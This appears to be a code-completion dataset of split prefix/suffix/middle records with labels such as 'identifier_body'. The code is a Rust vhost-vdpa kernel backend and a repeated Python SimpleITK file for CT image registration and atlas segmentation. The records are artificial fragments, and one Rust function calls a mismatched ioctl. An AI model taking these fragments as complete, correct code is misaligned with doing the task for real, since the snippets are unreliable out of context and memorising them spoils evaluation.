};
buffer.copy_from_slice(config.as_slice());
ioctl_result(ret, ())
}
fn set_config(&self, offset: u32, buffer: &[u8]) -> Result<()> {
let mut config = VhostVdpaConfig::new(buffer.len())
.map_err(|_| Error::IoctlError(IOError::from_raw_os_error(libc::ENOMEM)))?;
config.as_mut_fam_struct().off = offset;
config.as_mut_slice().copy_from_slice(buffer);
let ret =
unsafe { ioctl_with_ptr(self, VHOST_VDPA_SET_CONFIG(), config.as_fam_struct_ptr()) };
ioctl_result(ret, ())
}
fn set_vring_enable(&self, queue_index: usize, enabled: bool) -> Result<()> {
let vring_state = vhost_vring_state {
index: queue_index as u32,
num: enabled as u32,
};
let ret = unsafe { ioctl_with_ref(self, VHOST_VDPA_SET_VRING_ENABLE(), &vring_state) };
ioctl_result(ret, ())
}
fn get_vring_num(&self) -> Result<u16> {
let mut vring_num: u16 = 0;
let ret = unsafe { ioctl_with_mut_ref(self, VHOST_VDPA_GET_VRING_NUM(), &mut vring_num) };
ioctl_result(ret, vring_num)
}
fn set_config_call(&self, fd: &EventFd) -> Result<()> {
let event_fd: ::std::os::raw::c_int = fd.as_raw_fd();
let ret = unsafe { ioctl_with_ref(self, VHOST_VDPA_SET_CONFIG_CALL(), &event_fd) };
ioctl_result(ret, ())
}
fn get_iova_range(&self) -> Result<VhostVdpaIovaRange> {
let mut low_iova_range = vhost_vdpa_iova_range { first: 0, last: 0 };
let ret =
unsafe { ioctl_with_mut_ref(self, VHOST_VDPA_GET_VRING_NUM(), &mut low_iova_range) };
let iova_range = VhostVdpaIovaRange {
first: low_iova_range.first,
last: low_iova_range.last,
};
ioctl_result(ret, iova_range)
}
fn dma_map(&self, iova: u64, size: u64, vaddr: *const u8, readonly: bool) -> Result<()> {
let iotlb = VhostIotlbMsg {
iova,
size,
userspace_addr: vaddr as u64,
perm: match readonly {
true => VhostAccess::ReadOnly,
false => VhostAccess::ReadWrite,
},
msg_type: VhostIotlbType::Update,
};
self.send_iotlb_msg(&iotlb)
}
fn dma_unmap(&self, iova: u64, size: u64) -> Result<()> {
let iotlb = VhostIotlbMsg {
iova,
size,
msg_type: VhostIotlbType::Invalidate,
..Default::default()
};
self.send_iotlb_msg(&iotlb)
}
}
impl<AS: GuestAddressSpace> VhostKernBackend for VhostKernVdpa<AS> {
type AS = AS;
fn mem(&self) -> &Self::AS
|
}
impl<AS: GuestAddressSpace> AsRawFd for VhostKernVdpa<AS> {
fn as_raw_fd(&self) -> RawFd {
self.fd.as_raw_fd()
}
}
impl<AS: GuestAddressSpace> VhostKernFeatures for VhostKernVdpa<AS> {
fn get_backend_features_acked(&self) -> u64 {
self.backend_features_acked
}
fn set_backend_features_acked(&mut self, features: u64) {
self.backend_features_acked = features;
}
}
#[cfg(test)]
mod tests {
const VHOST_VDPA_PATH: &str = "/dev/vhost-vdpa-0";
use std::alloc::{alloc, dealloc, Layout};
use vm_memory::{GuestAddress, GuestMemory, GuestMemoryMmap};
use vmm_sys_util::eventfd::EventFd;
use super::*;
use crate::{
VhostBackend, VhostUserDirtyLogRegion, VhostUserMemoryRegionInfo, VringConfigData,
};
use serial_test::serial;
use std::io::ErrorKind;
/// macro to skip test if vhost-vdpa device path is not found.
///
/// vDPA simulators are available since Linux 5.7, but the CI may have
/// an older kernel, so for now we skip the test if we don't find
/// the device.
macro_rules! unwrap_not_found {
( $e:expr ) => {
match $e {
Ok(v) => v,
Err(error) => match error {
Error::VhostOpen(ref e) if e.kind() == ErrorKind::NotFound => {
println!("Err: {:?} SKIPPED", e);
return;
}
e => panic!("Err: {:?}", e),
},
}
};
}
#[test]
#[serial]
fn test_vdpa_kern_new_device() {
let m = GuestMemoryMmap::<()>::from_ranges(&[(GuestAddress(0), 0x10_0000)]).unwrap();
let vdpa = unwrap_not_found!(VhostKernVdpa::new(VHOST_VDPA_PATH, &m));
assert!(vdpa.as_raw_fd() >= 0);
assert!(vdpa.mem().find_region(GuestAddress(0x100)).is_some());
assert!(vdpa.mem().find_region(GuestAddress(0x10_0000)).is_none());
}
#[test]
#[serial]
fn test_vdpa_kern_is_valid() {
let m = GuestMemoryMmap::<()>::from_ranges(&[(GuestAddress(0), 0x10_0000)]).unwrap();
let vdpa = unwrap_not_found!(VhostKernVdpa::new(VHOST_VDPA_PATH, &m));
let mut config = VringConfigData {
queue_max_size: 32,
queue_size: 32,
flags: 0,
desc_table_addr: 0x1000,
used_ring_addr: 0x2000,
avail_ring_addr: 0x3000,
log_addr: None,
};
assert_eq!(vdpa.is_valid(&config), true);
config.queue_size = 0;
assert_eq!(vdpa.is_valid(&config), false);
config.queue_size = 31;
assert_eq!(vdpa.is_valid(&config), false);
config.queue_size = 33;
assert_eq!(vdpa.is_valid(&config), false);
}
#[test]
#[serial]
fn test_vdpa_kern_ioctls() {
let m = GuestMemoryMmap::<()>::from_ranges(&[(GuestAddress(0), 0x10_0000)]).unwrap();
let vdpa = unwrap_not_found!(VhostKernVdpa::new(VHOST_VDPA_PATH, &m));
let features = vdpa.get_features().unwrap();
// VIRTIO_F_VERSION_1 (bit 32) should be set
assert_ne!(features & (1 << 32),
|
{
&self.mem
}
|
identifier_body
|
functions.py
|
Initializer(im_ref, im_mov, sitk.ScaleSkewVersor3DTransform(),
sitk.CenteredTransformInitializerFilter.MOMENTS)
# Initialize registration
lin_transformation = sitk.ImageRegistrationMethod()
# Set metrics
lin_transformation.SetMetricAsMeanSquares()
lin_transformation.SetMetricSamplingStrategy(lin_transformation.RANDOM)
lin_transformation.SetMetricSamplingPercentage(0.01)
# Set mask
if mov_mask:
lin_transformation.SetMetricMovingMask(mov_mask)
# Gradient Descent optimizer
lin_transformation.SetOptimizerAsGradientDescent(learningRate=1, numberOfIterations=400,
convergenceMinimumValue=1e-6, convergenceWindowSize=10)
lin_transformation.SetOptimizerScalesFromPhysicalShift()
# Set the initial transformation
lin_transformation.SetInitialTransform(initial_transform)
# Switching to preferred variable
lin_xfm = lin_transformation
if show_parameters:
print(lin_xfm)
return lin_xfm
# # Estimation function # #
# --------------------------- #
# Non-linear 'Demons' registration function
# --------------------------- #
# --- Input --- #
# im_ref : The common image [numpy.ndarray]
# fixed_mask : The mask of common image, default is None [numpy.ndarray]
# show_parameters : If you want to see the parameters, false by default [boolean]
# --- Output --- #
# nl_xfm : Estimated transformation parameters [itk.simple.Transform]
def est_nl_transf(im_ref, fixed_mask=None, show_parameters=False):
# Initialize the registration
reg_method = sitk.ImageRegistrationMethod()
# Create initial identity transformation.
transform_to_displacement_field_filter = sitk.TransformToDisplacementFieldFilter()
transform_to_displacement_field_filter.SetReferenceImage(im_ref)
initial_transform = sitk.DisplacementFieldTransform(
transform_to_displacement_field_filter.Execute(sitk.Transform()))
# Regularization. The update field refers to fluid regularization; the total field to elastic regularization.
initial_transform.SetSmoothingGaussianOnUpdate(varianceForUpdateField=0, varianceForTotalField=1.5)
# Set the initial transformation
reg_method.SetInitialTransform(initial_transform)
# Set Demons registration
reg_method.SetMetricAsDemons(intensityDifferenceThreshold=0.001)
# Evaluate the metrics only in the mask
if fixed_mask is not None:
reg_method.SetMetricFixedMask(fixed_mask)
# Set a linear interpolator
reg_method.SetInterpolator(sitk.sitkLinear)
# Set a gradient descent optimizer
reg_method.SetOptimizerAsGradientDescent(learningRate=1.0, numberOfIterations=10, convergenceMinimumValue=1e-6,
convergenceWindowSize=10)
reg_method.SetOptimizerScalesFromPhysicalShift()
# Switching to the preferred variable
nl_xfm = reg_method
if show_parameters:
print(nl_xfm)
return nl_xfm
# # Application function # #
# --------------------------- #
# Executes either the linear or the non-linear function
# --------------------------- #
# --- Input --- #
# im_ref : The common image [numpy.ndarray]
# im_mov : The group image [numpy.ndarray]
# trafo : The chosen transformation [numpy.ndarray]
# show_parameters : If you want to see the parameters, false by default [boolean]
# --- Output --- #
# final_image : Returns the registered image [numpy.ndarray]
def
|
(im_ref, im_mov, trafo, show_parameters=False):
# Perform registration (Executes it)
transf = trafo.Execute(sitk.Cast(im_ref, sitk.sitkFloat32), sitk.Cast(im_mov, sitk.sitkFloat32))
if show_parameters:
print(transf)
print("--------")
print("Optimizer stop condition: {0}".format(trafo.GetOptimizerStopConditionDescription()))
print("Number of iterations: {0}".format(trafo.GetOptimizerIteration()))
print("--------")
return transf
# # Atlas segmentation function # #
# --------------------------- #
# Atlas-based segmentation using the CT images in 'ct_list'
# and corresponding segmentation masks from 'seg_list'.
# After that, majority voting to return a segmentation mask.
# --------------------------- #
# --- Input --- #
# common_img : The chosen COMMON image [sitk-image]
# ct_list : List of GROUP images [list]
# seg_list : List of GROUP masks [list]
# --- Output --- #
# segmented_array : The segmentation as an array [numpy.ndarray]
def seg_atlas(common_img, ct_list, seg_list):
# Creating the necessary lists
seg = []
image_list = []
# # REGISTRATION # #
for i in range(len(ct_list)):
# Adjusting the settings and applying
trafo_settings = est_lin_transf(common_img, ct_list[i], mov_mask=seg_list[i], show_parameters=False)
final_trafo = apply_transf(common_img, ct_list[i], trafo_settings)
# Perform registration on mask image
resampler = sitk.ResampleImageFilter()
resampler.SetReferenceImage(common_img)
resampler.SetInterpolator(sitk.sitkLinear)
resampler.SetTransform(final_trafo)
resampled_mask = resampler.Execute(seg_list[i])
resampled_mask_data = sitk.GetArrayFromImage(resampled_mask)
seg.append(resampled_mask_data)
# # MAJORITY VOTING # #
for i in range(len(seg)):
for j in range(i + 1, len(seg)):
arr1 = np.transpose(np.nonzero(seg[i]))
arr2 = np.transpose(np.nonzero(seg[j]))
# Filling two lists
arr1list = [tuple(e) for e in arr1.tolist()]
arr2list = [tuple(e) for e in arr2.tolist()]
# Sorting both lists
arr1list.sort()
arr2list.sort()
# Creating necessary list & sorting
intersections = list(set(arr1list).intersection(arr2list))
intersections.sort()
image_list.append(intersections)
# Creating a list which contains the indexes of intersecting voxels
intersection_list = list(set(image_list[0]) | set(image_list[1]) | set(image_list[2]))
# Sorting the list
intersection_list.sort()
# Fetches array from image
image_array = sitk.GetArrayFromImage(common_img)
# Creates an array for the points and fills it using indexes
segmented_array = np.zeros(shape=image_array.shape, dtype=np.uint8)
for x, y, z in intersection_list:
segmented_array[x, y, z] = 1
return segmented_array
# # Similarity function # #
# --------------------------- #
# Calculates the following distances between images:
# 1. Jaccard coef.
# 2. Dice coef.
# 3. Hausdorff distance
# --------------------------- #
# --- Input --- #
# mask_img : The mask image [sikt-image]
# seg_img: The segmented image [sikt-image]
# --- Output --- #
# None
def distances(mask_img, seg_img):
# Creating the necessary filters
hausdorff = sitk.HausdorffDistanceImageFilter()
overlap = sitk.LabelOverlapMeasuresImageFilter()
# Execute filters
hausdorff.Execute(mask_img, seg_img)
overlap.Execute(mask_img, seg_img)
# Fetching the distances and appending to distance list
# Jaccard coef.
jaccard = overlap.GetJaccardCoefficient()
# Dice coef.
dice = overlap.GetDiceCoefficient()
# Hausdorff distance
hausdorff_distance = hausdorff.GetHausdorffDistance()
# Printing out the distances for user
print('The Hausdorff distance: {}'.format(
hausdorff_distance))
print('The Dice coefficient: {}'.format(dice))
print('The Jaccard coefficient: {}'.format(jaccard))
return None
# # Classifier Function # #
# --------------------------- #
# Trains a random forest classifier by reading 2d images and comparing
# them to a vector which has labels that correspond to if it contains
# the pubic symphysis. The labels are binary.
# --------------------------- #
# --- Input --- #
# slice_list : List of 2D slice images [list]
# vector_list : List of vectors with binary labels [list]
# --- Output --- #
# trained_forest : Trained random forest classifier [sklearn.ensemble.forest.RandomForestClassifier]
def train_classifier(slice_list, vector_list):
# Creating necessary list
x_train_list = []
# Reading in input data
for image in slice_list:
# Fetching arrays
image_array = sitk.GetArrayFromImage(image)
# Resizing
image_array.resize((512, 512, 512))
for z in range(image_array.shape[2]):
x_train_list.append(image_array[:, :, z].flatten())
x_train = np.asarray(x_train_list, dtype=np.uint8)
# Reading in training labels
y_train = None
for i in range(0, len(vector_list)):
if i == 0:
y_train = vector_list[i]
else:
y_train = np.concatenate([y_train, vector_list[i]])
# Train classifier
trained_forest = RandomForestClassifier(n_estimators=150)
|
apply_transf
|
identifier_name
|
functions.py
|
Initializer(im_ref, im_mov, sitk.ScaleSkewVersor3DTransform(),
sitk.CenteredTransformInitializerFilter.MOMENTS)
# Initialize registration
lin_transformation = sitk.ImageRegistrationMethod()
# Set metrics
lin_transformation.SetMetricAsMeanSquares()
lin_transformation.SetMetricSamplingStrategy(lin_transformation.RANDOM)
lin_transformation.SetMetricSamplingPercentage(0.01)
# Set mask
if mov_mask:
lin_transformation.SetMetricMovingMask(mov_mask)
# Gradient Descent optimizer
lin_transformation.SetOptimizerAsGradientDescent(learningRate=1, numberOfIterations=400,
convergenceMinimumValue=1e-6, convergenceWindowSize=10)
lin_transformation.SetOptimizerScalesFromPhysicalShift()
# Set the initial transformation
lin_transformation.SetInitialTransform(initial_transform)
# Switching to preferred variable
lin_xfm = lin_transformation
if show_parameters:
print(lin_xfm)
return lin_xfm
# # Estimation function # #
# --------------------------- #
# Non-linear 'Demons' registration function
# --------------------------- #
# --- Input --- #
# im_ref : The common image [numpy.ndarray]
# fixed_mask : The mask of common image, default is None [numpy.ndarray]
# show_parameters : If you want to see the parameters, false by default [boolean]
# --- Output --- #
# nl_xfm : Estimated transformation parameters [itk.simple.Transform]
def est_nl_transf(im_ref, fixed_mask=None, show_parameters=False):
# Initialize the registration
reg_method = sitk.ImageRegistrationMethod()
# Create initial identity transformation.
transform_to_displacement_field_filter = sitk.TransformToDisplacementFieldFilter()
transform_to_displacement_field_filter.SetReferenceImage(im_ref)
initial_transform = sitk.DisplacementFieldTransform(
transform_to_displacement_field_filter.Execute(sitk.Transform()))
# Regularization. The update field refers to fluid regularization; the total field to elastic regularization.
initial_transform.SetSmoothingGaussianOnUpdate(varianceForUpdateField=0, varianceForTotalField=1.5)
# Set the initial transformation
reg_method.SetInitialTransform(initial_transform)
# Set Demons registration
reg_method.SetMetricAsDemons(intensityDifferenceThreshold=0.001)
# Evaluate the metrics only in the mask
if fixed_mask is not None:
reg_method.SetMetricFixedMask(fixed_mask)
# Set a linear interpolator
reg_method.SetInterpolator(sitk.sitkLinear)
# Set a gradient descent optimizer
reg_method.SetOptimizerAsGradientDescent(learningRate=1.0, numberOfIterations=10, convergenceMinimumValue=1e-6,
convergenceWindowSize=10)
reg_method.SetOptimizerScalesFromPhysicalShift()
# Switching to the preferred variable
nl_xfm = reg_method
if show_parameters:
print(nl_xfm)
return nl_xfm
# # Application function # #
# --------------------------- #
# Executes either the linear or the non-linear function
# --------------------------- #
# --- Input --- #
# im_ref : The common image [numpy.ndarray]
# im_mov : The group image [numpy.ndarray]
# trafo : The chosen transformation [numpy.ndarray]
# show_parameters : If you want to see the parameters, false by default [boolean]
# --- Output --- #
# final_image : Returns the registered image [numpy.ndarray]
def apply_transf(im_ref, im_mov, trafo, show_parameters=False):
# Perform registration (Executes it)
transf = trafo.Execute(sitk.Cast(im_ref, sitk.sitkFloat32), sitk.Cast(im_mov, sitk.sitkFloat32))
if show_parameters:
print(transf)
print("--------")
print("Optimizer stop condition: {0}".format(trafo.GetOptimizerStopConditionDescription()))
print("Number of iterations: {0}".format(trafo.GetOptimizerIteration()))
print("--------")
return transf
# # Atlas segmentation function # #
# --------------------------- #
# Atlas-based segmentation using the CT images in 'ct_list'
# and corresponding segmentation masks from 'seg_list'.
# After that, majority voting to return a segmentation mask.
# --------------------------- #
# --- Input --- #
# common_img : The chosen COMMON image [sitk-image]
# ct_list : List of GROUP images [list]
# seg_list : List of GROUP masks [list]
# --- Output --- #
# segmented_array : The segmentation as an array [numpy.ndarray]
def seg_atlas(common_img, ct_list, seg_list):
# Creating the necessary lists
seg = []
image_list = []
# # REGISTRATION # #
for i in range(len(ct_list)):
# Adjusting the settings and applying
trafo_settings = est_lin_transf(common_img, ct_list[i], mov_mask=seg_list[i], show_parameters=False)
final_trafo = apply_transf(common_img, ct_list[i], trafo_settings)
# Perform registration on mask image
resampler = sitk.ResampleImageFilter()
resampler.SetReferenceImage(common_img)
resampler.SetInterpolator(sitk.sitkLinear)
resampler.SetTransform(final_trafo)
resampled_mask = resampler.Execute(seg_list[i])
resampled_mask_data = sitk.GetArrayFromImage(resampled_mask)
seg.append(resampled_mask_data)
# # MAJORITY VOTING # #
for i in range(len(seg)):
|
# Creating a list which contains the indexes of intersecting voxels
intersection_list = list(set(image_list[0]) | set(image_list[1]) | set(image_list[2]))
# Sorting the list
intersection_list.sort()
# Fetches array from image
image_array = sitk.GetArrayFromImage(common_img)
# Creates an array for the points and fills it using indexes
segmented_array = np.zeros(shape=image_array.shape, dtype=np.uint8)
for x, y, z in intersection_list:
segmented_array[x, y, z] = 1
return segmented_array
# # Similarity function # #
# --------------------------- #
# Calculates the following distances between images:
# 1. Jaccard coef.
# 2. Dice coef.
# 3. Hausdorff distance
# --------------------------- #
# --- Input --- #
# mask_img : The mask image [sikt-image]
# seg_img: The segmented image [sikt-image]
# --- Output --- #
# None
def distances(mask_img, seg_img):
# Creating the necessary filters
hausdorff = sitk.HausdorffDistanceImageFilter()
overlap = sitk.LabelOverlapMeasuresImageFilter()
# Execute filters
hausdorff.Execute(mask_img, seg_img)
overlap.Execute(mask_img, seg_img)
# Fetching the distances and appending to distance list
# Jaccard coef.
jaccard = overlap.GetJaccardCoefficient()
# Dice coef.
dice = overlap.GetDiceCoefficient()
# Hausdorff distance
hausdorff_distance = hausdorff.GetHausdorffDistance()
# Printing out the distances for user
print('The Hausdorff distance: {}'.format(
hausdorff_distance))
print('The Dice coefficient: {}'.format(dice))
print('The Jaccard coefficient: {}'.format(jaccard))
return None
# # Classifier Function # #
# --------------------------- #
# Trains a random forest classifier by reading 2d images and comparing
# them to a vector which has labels that correspond to if it contains
# the pubic symphysis. The labels are binary.
# --------------------------- #
# --- Input --- #
# slice_list : List of 2D slice images [list]
# vector_list : List of vectors with binary labels [list]
# --- Output --- #
# trained_forest : Trained random forest classifier [sklearn.ensemble.forest.RandomForestClassifier]
def train_classifier(slice_list, vector_list):
# Creating necessary list
x_train_list = []
# Reading in input data
for image in slice_list:
# Fetching arrays
image_array = sitk.GetArrayFromImage(image)
# Resizing
image_array.resize((512, 512, 512))
for z in range(image_array.shape[2]):
x_train_list.append(image_array[:, :, z].flatten())
x_train = np.asarray(x_train_list, dtype=np.uint8)
# Reading in training labels
y_train = None
for i in range(0, len(vector_list)):
if i == 0:
y_train = vector_list[i]
else:
y_train = np.concatenate([y_train, vector_list[i]])
# Train classifier
trained_forest = RandomForestClassifier(n_estimators=150)
|
for j in range(i + 1, len(seg)):
arr1 = np.transpose(np.nonzero(seg[i]))
arr2 = np.transpose(np.nonzero(seg[j]))
# Filling two lists
arr1list = [tuple(e) for e in arr1.tolist()]
arr2list = [tuple(e) for e in arr2.tolist()]
# Sorting both lists
arr1list.sort()
arr2list.sort()
# Creating necessary list & sorting
intersections = list(set(arr1list).intersection(arr2list))
intersections.sort()
image_list.append(intersections)
|
conditional_block
|
functions.py
|
Initializer(im_ref, im_mov, sitk.ScaleSkewVersor3DTransform(),
sitk.CenteredTransformInitializerFilter.MOMENTS)
# Initialize registration
lin_transformation = sitk.ImageRegistrationMethod()
# Set metrics
lin_transformation.SetMetricAsMeanSquares()
lin_transformation.SetMetricSamplingStrategy(lin_transformation.RANDOM)
lin_transformation.SetMetricSamplingPercentage(0.01)
# Set mask
if mov_mask:
lin_transformation.SetMetricMovingMask(mov_mask)
# Gradient Descent optimizer
lin_transformation.SetOptimizerAsGradientDescent(learningRate=1, numberOfIterations=400,
convergenceMinimumValue=1e-6, convergenceWindowSize=10)
lin_transformation.SetOptimizerScalesFromPhysicalShift()
# Set the initial transformation
lin_transformation.SetInitialTransform(initial_transform)
# Switching to preferred variable
lin_xfm = lin_transformation
if show_parameters:
print(lin_xfm)
return lin_xfm
# # Estimation function # #
# --------------------------- #
# Non-linear 'Demons' registration function
# --------------------------- #
# --- Input --- #
# im_ref : The common image [numpy.ndarray]
# fixed_mask : The mask of common image, default is None [numpy.ndarray]
# show_parameters : If you want to see the parameters, false by default [boolean]
# --- Output --- #
# nl_xfm : Estimated transformation parameters [itk.simple.Transform]
def est_nl_transf(im_ref, fixed_mask=None, show_parameters=False):
# Initialize the registration
reg_method = sitk.ImageRegistrationMethod()
# Create initial identity transformation.
transform_to_displacement_field_filter = sitk.TransformToDisplacementFieldFilter()
transform_to_displacement_field_filter.SetReferenceImage(im_ref)
initial_transform = sitk.DisplacementFieldTransform(
transform_to_displacement_field_filter.Execute(sitk.Transform()))
# Regularization. The update field refers to fluid regularization; the total field to elastic regularization.
initial_transform.SetSmoothingGaussianOnUpdate(varianceForUpdateField=0, varianceForTotalField=1.5)
# Set the initial transformation
reg_method.SetInitialTransform(initial_transform)
# Set Demons registration
reg_method.SetMetricAsDemons(intensityDifferenceThreshold=0.001)
# Evaluate the metrics only in the mask
if fixed_mask is not None:
reg_method.SetMetricFixedMask(fixed_mask)
# Set a linear interpolator
reg_method.SetInterpolator(sitk.sitkLinear)
# Set a gradient descent optimizer
reg_method.SetOptimizerAsGradientDescent(learningRate=1.0, numberOfIterations=10, convergenceMinimumValue=1e-6,
convergenceWindowSize=10)
reg_method.SetOptimizerScalesFromPhysicalShift()
# Switching to the preferred variable
nl_xfm = reg_method
if show_parameters:
print(nl_xfm)
return nl_xfm
# # Application function # #
# --------------------------- #
# Executes either the linear or the non-linear function
# --------------------------- #
# --- Input --- #
# im_ref : The common image [numpy.ndarray]
# im_mov : The group image [numpy.ndarray]
# trafo : The chosen transformation [numpy.ndarray]
# show_parameters : If you want to see the parameters, false by default [boolean]
# --- Output --- #
# final_image : Returns the registered image [numpy.ndarray]
def apply_transf(im_ref, im_mov, trafo, show_parameters=False):
# Perform registration (Executes it)
transf = trafo.Execute(sitk.Cast(im_ref, sitk.sitkFloat32), sitk.Cast(im_mov, sitk.sitkFloat32))
if show_parameters:
print(transf)
print("--------")
print("Optimizer stop condition: {0}".format(trafo.GetOptimizerStopConditionDescription()))
print("Number of iterations: {0}".format(trafo.GetOptimizerIteration()))
print("--------")
return transf
# # Atlas segmentation function # #
# --------------------------- #
# Atlas-based segmentation using the CT images in 'ct_list'
# and corresponding segmentation masks from 'seg_list'.
# After that, majority voting to return a segmentation mask.
# --------------------------- #
# --- Input --- #
# common_img : The chosen COMMON image [sitk-image]
# ct_list : List of GROUP images [list]
# seg_list : List of GROUP masks [list]
# --- Output --- #
# segmented_array : The segmentation as an array [numpy.ndarray]
def seg_atlas(common_img, ct_list, seg_list):
# Creating the necessary lists
|
# # MAJORITY VOTING # #
for i in range(len(seg)):
for j in range(i + 1, len(seg)):
arr1 = np.transpose(np.nonzero(seg[i]))
arr2 = np.transpose(np.nonzero(seg[j]))
# Filling two lists
arr1list = [tuple(e) for e in arr1.tolist()]
arr2list = [tuple(e) for e in arr2.tolist()]
# Sorting both lists
arr1list.sort()
arr2list.sort()
# Creating necessary list & sorting
intersections = list(set(arr1list).intersection(arr2list))
intersections.sort()
image_list.append(intersections)
# Creating a list which contains the indexes of intersecting voxels
intersection_list = list(set(image_list[0]) | set(image_list[1]) | set(image_list[2]))
# Sorting the list
intersection_list.sort()
# Fetches array from image
image_array = sitk.GetArrayFromImage(common_img)
# Creates an array for the points and fills it using indexes
segmented_array = np.zeros(shape=image_array.shape, dtype=np.uint8)
for x, y, z in intersection_list:
segmented_array[x, y, z] = 1
return segmented_array
# # Similarity function # #
# --------------------------- #
# Calculates the following distances between images:
# 1. Jaccard coef.
# 2. Dice coef.
# 3. Hausdorff distance
# --------------------------- #
# --- Input --- #
# mask_img : The mask image [sikt-image]
# seg_img: The segmented image [sikt-image]
# --- Output --- #
# None
def distances(mask_img, seg_img):
# Creating the necessary filters
hausdorff = sitk.HausdorffDistanceImageFilter()
overlap = sitk.LabelOverlapMeasuresImageFilter()
# Execute filters
hausdorff.Execute(mask_img, seg_img)
overlap.Execute(mask_img, seg_img)
# Fetching the distances and appending to distance list
# Jaccard coef.
jaccard = overlap.GetJaccardCoefficient()
# Dice coef.
dice = overlap.GetDiceCoefficient()
# Hausdorff distance
hausdorff_distance = hausdorff.GetHausdorffDistance()
# Printing out the distances for user
print('The Hausdorff distance: {}'.format(
hausdorff_distance))
print('The Dice coefficient: {}'.format(dice))
print('The Jaccard coefficient: {}'.format(jaccard))
return None
# # Classifier Function # #
# --------------------------- #
# Trains a random forest classifier by reading 2d images and comparing
# them to a vector which has labels that correspond to if it contains
# the pubic symphysis. The labels are binary.
# --------------------------- #
# --- Input --- #
# slice_list : List of 2D slice images [list]
# vector_list : List of vectors with binary labels [list]
# --- Output --- #
# trained_forest : Trained random forest classifier [sklearn.ensemble.forest.RandomForestClassifier]
def train_classifier(slice_list, vector_list):
# Creating necessary list
x_train_list = []
# Reading in input data
for image in slice_list:
# Fetching arrays
image_array = sitk.GetArrayFromImage(image)
# Resizing
image_array.resize((512, 512, 512))
for z in range(image_array.shape[2]):
x_train_list.append(image_array[:, :, z].flatten())
x_train = np.asarray(x_train_list, dtype=np.uint8)
# Reading in training labels
y_train = None
for i in range(0, len(vector_list)):
if i == 0:
y_train = vector_list[i]
else:
y_train = np.concatenate([y_train, vector_list[i]])
# Train classifier
trained_forest = RandomForestClassifier(n_estimators=150
|
seg = []
image_list = []
# # REGISTRATION # #
for i in range(len(ct_list)):
# Adjusting the settings and applying
trafo_settings = est_lin_transf(common_img, ct_list[i], mov_mask=seg_list[i], show_parameters=False)
final_trafo = apply_transf(common_img, ct_list[i], trafo_settings)
# Perform registration on mask image
resampler = sitk.ResampleImageFilter()
resampler.SetReferenceImage(common_img)
resampler.SetInterpolator(sitk.sitkLinear)
resampler.SetTransform(final_trafo)
resampled_mask = resampler.Execute(seg_list[i])
resampled_mask_data = sitk.GetArrayFromImage(resampled_mask)
seg.append(resampled_mask_data)
|
identifier_body
|
functions.py
|
Initializer(im_ref, im_mov, sitk.ScaleSkewVersor3DTransform(),
sitk.CenteredTransformInitializerFilter.MOMENTS)
# Initialize registration
lin_transformation = sitk.ImageRegistrationMethod()
# Set metrics
lin_transformation.SetMetricAsMeanSquares()
lin_transformation.SetMetricSamplingStrategy(lin_transformation.RANDOM)
lin_transformation.SetMetricSamplingPercentage(0.01)
# Set mask
if mov_mask:
lin_transformation.SetMetricMovingMask(mov_mask)
# Gradient Descent optimizer
lin_transformation.SetOptimizerAsGradientDescent(learningRate=1, numberOfIterations=400,
convergenceMinimumValue=1e-6, convergenceWindowSize=10)
lin_transformation.SetOptimizerScalesFromPhysicalShift()
# Set the initial transformation
lin_transformation.SetInitialTransform(initial_transform)
# Switching to preferred variable
lin_xfm = lin_transformation
if show_parameters:
print(lin_xfm)
return lin_xfm
# # Estimation function # #
# --------------------------- #
# Non-linear 'Demons' registration function
# --------------------------- #
# --- Input --- #
# im_ref : The common image [numpy.ndarray]
# fixed_mask : The mask of common image, default is None [numpy.ndarray]
# show_parameters : If you want to see the parameters, false by default [boolean]
# --- Output --- #
# nl_xfm : Estimated transformation parameters [itk.simple.Transform]
def est_nl_transf(im_ref, fixed_mask=None, show_parameters=False):
# Initialize the registration
reg_method = sitk.ImageRegistrationMethod()
# Create initial identity transformation.
transform_to_displacement_field_filter = sitk.TransformToDisplacementFieldFilter()
transform_to_displacement_field_filter.SetReferenceImage(im_ref)
initial_transform = sitk.DisplacementFieldTransform(
transform_to_displacement_field_filter.Execute(sitk.Transform()))
# Regularization. The update field refers to fluid regularization; the total field to elastic regularization.
initial_transform.SetSmoothingGaussianOnUpdate(varianceForUpdateField=0, varianceForTotalField=1.5)
# Set the initial transformation
reg_method.SetInitialTransform(initial_transform)
# Set Demons registration
reg_method.SetMetricAsDemons(intensityDifferenceThreshold=0.001)
# Evaluate the metrics only in the mask
if fixed_mask is not None:
reg_method.SetMetricFixedMask(fixed_mask)
# Set a linear interpolator
reg_method.SetInterpolator(sitk.sitkLinear)
# Set a gradient descent optimizer
reg_method.SetOptimizerAsGradientDescent(learningRate=1.0, numberOfIterations=10, convergenceMinimumValue=1e-6,
convergenceWindowSize=10)
reg_method.SetOptimizerScalesFromPhysicalShift()
# Switching to the preferred variable
nl_xfm = reg_method
if show_parameters:
print(nl_xfm)
return nl_xfm
# # Application function # #
# --------------------------- #
# Executes either the linear or the non-linear function
# --------------------------- #
# --- Input --- #
# im_ref : The common image [numpy.ndarray]
# im_mov : The group image [numpy.ndarray]
# trafo : The chosen transformation [numpy.ndarray]
# show_parameters : If you want to see the parameters, false by default [boolean]
# --- Output --- #
# final_image : Returns the registered image [numpy.ndarray]
def apply_transf(im_ref, im_mov, trafo, show_parameters=False):
# Perform registration (Executes it)
transf = trafo.Execute(sitk.Cast(im_ref, sitk.sitkFloat32), sitk.Cast(im_mov, sitk.sitkFloat32))
if show_parameters:
print(transf)
print("--------")
print("Optimizer stop condition: {0}".format(trafo.GetOptimizerStopConditionDescription()))
print("Number of iterations: {0}".format(trafo.GetOptimizerIteration()))
print("--------")
return transf
# # Atlas segmentation function # #
# --------------------------- #
# Atlas-based segmentation using the CT images in 'ct_list'
# and corresponding segmentation masks from 'seg_list'.
# After that, majority voting to return a segmentation mask.
# --------------------------- #
# --- Input --- #
# common_img : The chosen COMMON image [sitk-image]
# ct_list : List of GROUP images [list]
# seg_list : List of GROUP masks [list]
# --- Output --- #
# segmented_array : The segmentation as an array [numpy.ndarray]
def seg_atlas(common_img, ct_list, seg_list):
# Creating the necessary lists
seg = []
image_list = []
# # REGISTRATION # #
for i in range(len(ct_list)):
# Adjusting the settings and applying
trafo_settings = est_lin_transf(common_img, ct_list[i], mov_mask=seg_list[i], show_parameters=False)
final_trafo = apply_transf(common_img, ct_list[i], trafo_settings)
# Perform registration on mask image
resampler = sitk.ResampleImageFilter()
resampler.SetReferenceImage(common_img)
resampler.SetInterpolator(sitk.sitkLinear)
resampler.SetTransform(final_trafo)
